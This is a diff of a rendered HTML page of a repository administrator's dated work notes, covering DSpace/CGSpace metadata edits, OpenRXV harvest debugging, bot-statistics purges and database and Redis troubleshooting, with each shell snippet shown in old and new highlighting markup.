</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ podman unshare chown 1000:1000 /home/aorth/.local/share/containers/storage/volumes/docker_esData_7/_data
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ podman unshare chown 1000:1000 /home/aorth/.local/share/containers/storage/volumes/docker_esData_7/_data
</span></span></code></pre></div><ul>
<li>The new OpenRXV harvesting method by Moayad uses pages of 10 items instead of 100 and it&rsquo;s much faster
<ul>
<li>I harvested 90,000+ items from DSpace Test in ~3 hours</li>
@ -231,23 +231,23 @@ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhos
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | wc -l
90459
$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | sort | uniq | wc -l
90380
$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | sort | uniq -c | sort -h
...
2 &#34;10568/99409&#34;
2 &#34;10568/99410&#34;
2 &#34;10568/99411&#34;
2 &#34;10568/99516&#34;
3 &#34;10568/102093&#34;
3 &#34;10568/103524&#34;
3 &#34;10568/106664&#34;
3 &#34;10568/106940&#34;
3 &#34;10568/107195&#34;
3 &#34;10568/96546&#34;
</code></pre></div><h2 id="2021-06-20">2021-06-20</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>90459
</span></span><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>90380
</span></span><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data.json | awk -F: <span style="color:#e6db74">&#39;{print $2}&#39;</span> | sort | uniq -c | sort -h
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> 2 &#34;10568/99409&#34;
</span></span><span style="display:flex;"><span> 2 &#34;10568/99410&#34;
</span></span><span style="display:flex;"><span> 2 &#34;10568/99411&#34;
</span></span><span style="display:flex;"><span> 2 &#34;10568/99516&#34;
</span></span><span style="display:flex;"><span> 3 &#34;10568/102093&#34;
</span></span><span style="display:flex;"><span> 3 &#34;10568/103524&#34;
</span></span><span style="display:flex;"><span> 3 &#34;10568/106664&#34;
</span></span><span style="display:flex;"><span> 3 &#34;10568/106940&#34;
</span></span><span style="display:flex;"><span> 3 &#34;10568/107195&#34;
</span></span><span style="display:flex;"><span> 3 &#34;10568/96546&#34;
</span></span></code></pre></div><h2 id="2021-06-20">2021-06-20</h2>
<ul>
<li>Udana asked me to update their IWMI subjects from <code>farmer managed irrigation systems</code> to <code>farmer-led irrigation</code>
<ul>
@ -255,12 +255,12 @@ $ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace metadata-export -i 10568/16814 -f /tmp/2021-06-20-IWMI.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace metadata-export -i 10568/16814 -f /tmp/2021-06-20-IWMI.csv
</span></span></code></pre></div><ul>
<li>Then I used <code>csvcut</code> to extract just the columns I needed and do the replacement into a new CSV:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;id,dcterms.subject[],dcterms.subject[en_US]&#39;</span> /tmp/2021-06-20-IWMI.csv | sed <span style="color:#e6db74">&#39;s/farmer managed irrigation systems/farmer-led irrigation/&#39;</span> &gt; /tmp/2021-06-20-IWMI-new-subjects.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,dcterms.subject[],dcterms.subject[en_US]&#39;</span> /tmp/2021-06-20-IWMI.csv | sed <span style="color:#e6db74">&#39;s/farmer managed irrigation systems/farmer-led irrigation/&#39;</span> &gt; /tmp/2021-06-20-IWMI-new-subjects.csv
</span></span></code></pre></div><ul>
<li>Then I uploaded the resulting CSV to CGSpace, updating 161 items</li>
<li>Start a harvest on AReS</li>
<li>I found <a href="https://jira.lyrasis.org/browse/DS-1977">a bug</a> and <a href="https://github.com/DSpace/DSpace/pull/2584">a patch</a> for the private items showing up in the DSpace sitemap bug
@ -278,19 +278,19 @@ $ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | wc -l
90937
$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | sort -u | wc -l
85709
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>90937
</span></span><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | sort -u | wc -l
</span></span><span style="display:flex;"><span>85709
</span></span></code></pre></div><ul>
<li>So those could be duplicates from the way we harvest pages, but they could also be from mappings&hellip;
<ul>
<li>Manually inspecting the duplicates where handles appear more than once:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | sort | uniq -c | sort -h
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | sort | uniq -c | sort -h
</span></span></code></pre></div><ul>
<li>Unfortunately I found no pattern:
<ul>
<li>Some appear twice in the Elasticsearch index, but appear in only one collection</li>
@ -312,23 +312,23 @@ $ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq length
5
$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq <span style="color:#e6db74">&#39;.[].handle&#39;</span>
&#34;10673/4&#34;
&#34;10673/3&#34;
&#34;10673/6&#34;
&#34;10673/5&#34;
&#34;10673/7&#34;
# log into DSpace Demo XMLUI as admin and make one item private <span style="color:#f92672">(</span><span style="color:#66d9ef">for</span> example 10673/6<span style="color:#f92672">)</span>
$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq length
4
$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq <span style="color:#e6db74">&#39;.[].handle&#39;</span>
&#34;10673/4&#34;
&#34;10673/3&#34;
&#34;10673/5&#34;
&#34;10673/7&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq length
</span></span><span style="display:flex;"><span>5
</span></span><span style="display:flex;"><span>$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq <span style="color:#e6db74">&#39;.[].handle&#39;</span>
</span></span><span style="display:flex;"><span>&#34;10673/4&#34;
</span></span><span style="display:flex;"><span>&#34;10673/3&#34;
</span></span><span style="display:flex;"><span>&#34;10673/6&#34;
</span></span><span style="display:flex;"><span>&#34;10673/5&#34;
</span></span><span style="display:flex;"><span>&#34;10673/7&#34;
</span></span><span style="display:flex;"><span># log into DSpace Demo XMLUI as admin and make one item private <span style="color:#f92672">(</span><span style="color:#66d9ef">for</span> example 10673/6<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq length
</span></span><span style="display:flex;"><span>4
</span></span><span style="display:flex;"><span>$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq <span style="color:#e6db74">&#39;.[].handle&#39;</span>
</span></span><span style="display:flex;"><span>&#34;10673/4&#34;
</span></span><span style="display:flex;"><span>&#34;10673/3&#34;
</span></span><span style="display:flex;"><span>&#34;10673/5&#34;
</span></span><span style="display:flex;"><span>&#34;10673/7&#34;
</span></span></code></pre></div><ul>
<li>I tested the pull request on DSpace Test and it works, so I left a note on GitHub and Jira</li>
<li>Last week I noticed that the Gender Platform website is using &ldquo;cgspace.cgiar.org&rdquo; links for CGSpace, instead of handles
<ul>
@ -355,11 +355,11 @@ $ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</spa
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data-local-ds-4065.json | wc -l
90327
$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data-local-ds-4065.json | sort -u | wc -l
90317
</code></pre></div><h2 id="2021-06-22">2021-06-22</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data-local-ds-4065.json | wc -l
</span></span><span style="display:flex;"><span>90327
</span></span><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data-local-ds-4065.json | sort -u | wc -l
</span></span><span style="display:flex;"><span>90317
</span></span></code></pre></div><h2 id="2021-06-22">2021-06-22</h2>
<ul>
<li>Make a <a href="https://github.com/atmire/COUNTER-Robots/pull/43">pull request</a> to the COUNTER-Robots project to add two new user agents: crusty and newspaper
<ul>
@ -368,13 +368,13 @@ $ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 1339 hits from RI\/1\.0 in statistics
Purging 447 hits from crusty in statistics
Purging 3736 hits from newspaper in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 5522
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
</span></span><span style="display:flex;"><span>Purging 1339 hits from RI\/1\.0 in statistics
</span></span><span style="display:flex;"><span>Purging 447 hits from crusty in statistics
</span></span><span style="display:flex;"><span>Purging 3736 hits from newspaper in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 5522
</span></span></code></pre></div><ul>
<li>Surprised to see RI/1.0 in there because it&rsquo;s been in the override file for a while</li>
<li>Looking at the 2021 statistics in Solr I see a few more suspicious user agents:
<ul>
@ -397,11 +397,11 @@ Purging 3736 hits from newspaper in statistics
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># journalctl --since<span style="color:#f92672">=</span>today -u tomcat7 | grep -c <span style="color:#e6db74">&#39;Connection has been abandoned&#39;</span>
978
$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
10100
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># journalctl --since<span style="color:#f92672">=</span>today -u tomcat7 | grep -c <span style="color:#e6db74">&#39;Connection has been abandoned&#39;</span>
</span></span><span style="display:flex;"><span>978
</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>10100
</span></span></code></pre></div><ul>
<li>I sent a message to Atmire, hoping that the database logging stuff they put in place last time this happened will be of help now</li>
<li>In the mean time, I decided to upgrade Tomcat from 7.0.107 to 7.0.109, and the PostgreSQL JDBC driver from 42.2.20 to 42.2.22 (first on DSpace Test)</li>
<li>I also applied the following patches from the 6.4 milestone to our <code>6_x-prod</code> branch:
@ -412,17 +412,17 @@ $ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN p
</li>
<li>After upgrading and restarting Tomcat the database connections and locks were back down to normal levels:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
63
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>63
</span></span></code></pre></div><ul>
<li>Looking in the DSpace log, the first &ldquo;pool empty&rdquo; message I saw this morning was at 4AM:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">2021-06-23 04:01:14,596 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ [http-bio-127.0.0.1-8443-exec-4323] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-06-23 04:01:14,596 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ [http-bio-127.0.0.1-8443-exec-4323] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
</span></span></code></pre></div><ul>
<li>Oh, and I notice 8,000 hits from a Flipboard bot using this user-agent:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)
</span></span></code></pre></div><ul>
<li>We can purge them, as this is not user traffic: <a href="https://about.flipboard.com/browserproxy/">https://about.flipboard.com/browserproxy/</a>
<ul>
<li>I will add it to our local user agent pattern file and eventually submit a pull request to COUNTER-Robots</li>
@ -448,17 +448,17 @@ $ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN p
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> cgspace-openrxv-items-temp-backup.json | wc -l
104797
$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> cgspace-openrxv-items-temp-backup.json | sort | uniq | wc -l
99186
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> cgspace-openrxv-items-temp-backup.json | wc -l
</span></span><span style="display:flex;"><span>104797
</span></span><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> cgspace-openrxv-items-temp-backup.json | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>99186
</span></span></code></pre></div><ul>
<li>This number is probably unique for that particular harvest, but I don&rsquo;t think it represents the true number of items&hellip;</li>
<li>The harvest of DSpace Test I did on my local test instance yesterday has about 91,000 items:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;DSpace Test&#34;&#39;</span> 2021-06-23-openrxv-items-final-local.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> | sort | uniq | wc -l
90990
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;DSpace Test&#34;&#39;</span> 2021-06-23-openrxv-items-final-local.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>90990
</span></span></code></pre></div><ul>
<li>So the harvest on the live site is missing items, then why didn&rsquo;t the add missing items plugin find them?!
<ul>
<li>I notice that we are missing the <code>type</code> in the metadata structure config for each repository on the production site, and we are using <code>type</code> for item type in the actual schema&hellip; so maybe there is a conflict there</li>
@ -469,8 +469,8 @@ $ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">172.104.229.92 - - [24/Jun/2021:07:52:58 +0200] &#34;GET /sitemap HTTP/1.1&#34; 503 190 &#34;-&#34; &#34;OpenRXV harvesting bot; https://github.com/ilri/OpenRXV&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>172.104.229.92 - - [24/Jun/2021:07:52:58 +0200] &#34;GET /sitemap HTTP/1.1&#34; 503 190 &#34;-&#34; &#34;OpenRXV harvesting bot; https://github.com/ilri/OpenRXV&#34;
</span></span></code></pre></div><ul>
<li>I fixed nginx so it always allows people to get the sitemap and then re-ran the plugins&hellip; now it&rsquo;s checking 180,000+ handles to see if they are collections or items&hellip;
<ul>
<li>I see it fetched the sitemap three times, we need to make sure it&rsquo;s only doing it once for each repository</li>
@ -478,9 +478,9 @@ $ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\
</li>
<li>According to the api logs we will be adding 5,697 items:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker logs api 2&gt;/dev/null | grep dspace_add_missing_items | sort | uniq | wc -l
5697
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker logs api 2&gt;/dev/null | grep dspace_add_missing_items | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>5697
</span></span></code></pre></div><ul>
<li>Spent a few hours with Moayad troubleshooting and improving OpenRXV
<ul>
<li>We found a bug in the harvesting code that can occur when you are harvesting DSpace 5 and DSpace 6 instances, as DSpace 5 uses numeric (long) IDs, and DSpace 6 uses UUIDs</li>
@ -496,35 +496,35 @@ $ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ redis-cli
127.0.0.1:6379&gt; SCAN 0 COUNT 5
1) &#34;49152&#34;
2) 1) &#34;bull:plugins:476595&#34;
2) &#34;bull:plugins:367382&#34;
3) &#34;bull:plugins:369228&#34;
4) &#34;bull:plugins:438986&#34;
5) &#34;bull:plugins:366215&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ redis-cli
</span></span><span style="display:flex;"><span>127.0.0.1:6379&gt; SCAN 0 COUNT 5
</span></span><span style="display:flex;"><span>1) &#34;49152&#34;
</span></span><span style="display:flex;"><span>2) 1) &#34;bull:plugins:476595&#34;
</span></span><span style="display:flex;"><span> 2) &#34;bull:plugins:367382&#34;
</span></span><span style="display:flex;"><span> 3) &#34;bull:plugins:369228&#34;
</span></span><span style="display:flex;"><span> 4) &#34;bull:plugins:438986&#34;
</span></span><span style="display:flex;"><span> 5) &#34;bull:plugins:366215&#34;
</span></span></code></pre></div><ul>
<li>We can apparently get the names of the jobs in each hash using <code>hget</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">127.0.0.1:6379&gt; TYPE bull:plugins:401827
hash
127.0.0.1:6379&gt; HGET bull:plugins:401827 name
&#34;dspace_add_missing_items&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>127.0.0.1:6379&gt; TYPE bull:plugins:401827
</span></span><span style="display:flex;"><span>hash
</span></span><span style="display:flex;"><span>127.0.0.1:6379&gt; HGET bull:plugins:401827 name
</span></span><span style="display:flex;"><span>&#34;dspace_add_missing_items&#34;
</span></span></code></pre></div><ul>
<li>I whipped up a one liner to get the keys for all plugin jobs, convert to redis <code>HGET</code> commands to extract the value of the name field, and then sort them by their counts:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ redis-cli KEYS <span style="color:#e6db74">&#34;bull:plugins:*&#34;</span> <span style="color:#ae81ff">\
</span><span style="color:#ae81ff"></span> | sed -e &#39;s/^bull/HGET bull/&#39; -e &#39;s/\([[:digit:]]\)$/\1 name/&#39; \
| ncat -w 3 localhost 6379 \
| grep -v -E &#39;^\$&#39; | sort | uniq -c | sort -h
3 dspace_health_check
4 -ERR wrong number of arguments for &#39;hget&#39; command
12 mel_downloads_and_views
129 dspace_altmetrics
932 dspace_downloads_and_views
186428 dspace_add_missing_items
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ redis-cli KEYS <span style="color:#e6db74">&#34;bull:plugins:*&#34;</span> <span style="color:#ae81ff">\
